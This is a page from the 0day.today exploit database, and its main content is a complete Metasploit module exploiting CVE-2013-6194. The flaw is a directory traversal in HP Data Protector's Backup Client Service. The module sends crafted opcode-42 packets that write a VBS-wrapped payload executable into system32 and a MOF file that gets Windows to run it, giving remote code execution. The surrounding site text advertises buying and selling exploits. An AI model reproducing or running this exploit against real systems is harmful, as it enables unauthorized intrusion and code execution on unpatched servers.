0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
HP Data Protector Backup Client Service Directory Traversal
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::EXE include Msf::Exploit::WbemExec include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'HP Data Protector Backup Client Service Directory Traversal', 'Description' => %q{ This module exploits a directory traversal vulnerability in the Hewlett-Packard Data Protector product. The vulnerability exists at the Backup Client Service (OmniInet.exe) when parsing packets with opcode 42. This module has been tested successfully on HP Data Protector 6.20 on Windows 2003 SP2 and Windows XP SP3. }, 'Author' => [ 'Brian Gorenc', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-6194' ], [ 'OSVDB', '101630' ], [ 'BID', '64647' ], [ 'ZDI', '14-003' ], [ 'URL' , 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422' ] ], 'Privileged' => true, 'Payload' => { 'Space' => 2048, # Payload embedded into an exe 'DisableNops' => true }, 'DefaultOptions' => { 'WfsDelay' => 5 }, 'Platform' => 'win', 'Targets' => [ [ 'HP Data Protector 6.20 build 370 / Windows 2003 SP2', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 02 2014')) register_options([Opt::RPORT(5555)], self.class) end def check fingerprint = get_fingerprint if fingerprint.nil? return Exploit::CheckCode::Unknown end print_status("#{peer} - HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.06\.(\d+)/ minor = $1.to_i else return Exploit::CheckCode::Safe end if minor < 21 return Exploit::CheckCode::Vulnerable elsif minor == 21 return Exploit::CheckCode::Detected else return Exploit::CheckCode::Detected end end def exploit # Setup the necessary files to do the wbemexec trick vbs_name = rand_text_alpha(rand(10)+5) + '.vbs' exe = generate_payload_exe vbs = Msf::Util::EXE.to_exe_vbs(exe) mof_name = rand_text_alpha(rand(10)+5) + '.mof' mof = generate_mof(mof_name, vbs_name) # We can't upload binary contents, so embedding the exe into a VBS. print_status("#{peer} - Sending malicious packet with opcode 42 to upload the vbs payload #{vbs_name}...") upload_file("windows\\system32\\#{vbs_name}", vbs) register_file_for_cleanup(vbs_name) print_status("#{peer} - Sending malicious packet with opcode 42 to upload the mof file #{mof_name}") upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") end def peer "#{rhost}:#{rport}" end def build_pkt(fields) data = "\xff\xfe" # BOM Unicode fields.each do |v| data << "#{Rex::Text.to_unicode(v)}\x00\x00" data << Rex::Text.to_unicode(" ") # Separator end data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator return [data.length].pack("N") + data end def get_fingerprint ommni = connect ommni.put(rand_text_alpha_upper(64)) resp = ommni.get_once(-1) disconnect if resp.nil? return nil end return Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last nl end def upload_file(file_name, contents) connect pkt = build_pkt([ "2", # Message Type rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), "42", # Opcode rand_text_alpha(8), # command rand_text_alpha(8), # rissServerName rand_text_alpha(8), # rissServerPort "\\..\\..\\..\\..\\..\\#{file_name}", # rissServerCertificate contents # Certificate contents ]) sock.put(pkt) sock.get_once # You cannot be confident about the response to guess if upload # has been successful or not. While testing, different result codes, # including also no response because of timeout due to a process # process execution after file write on the target disconnect end end # 0day.today [2024-12-24] #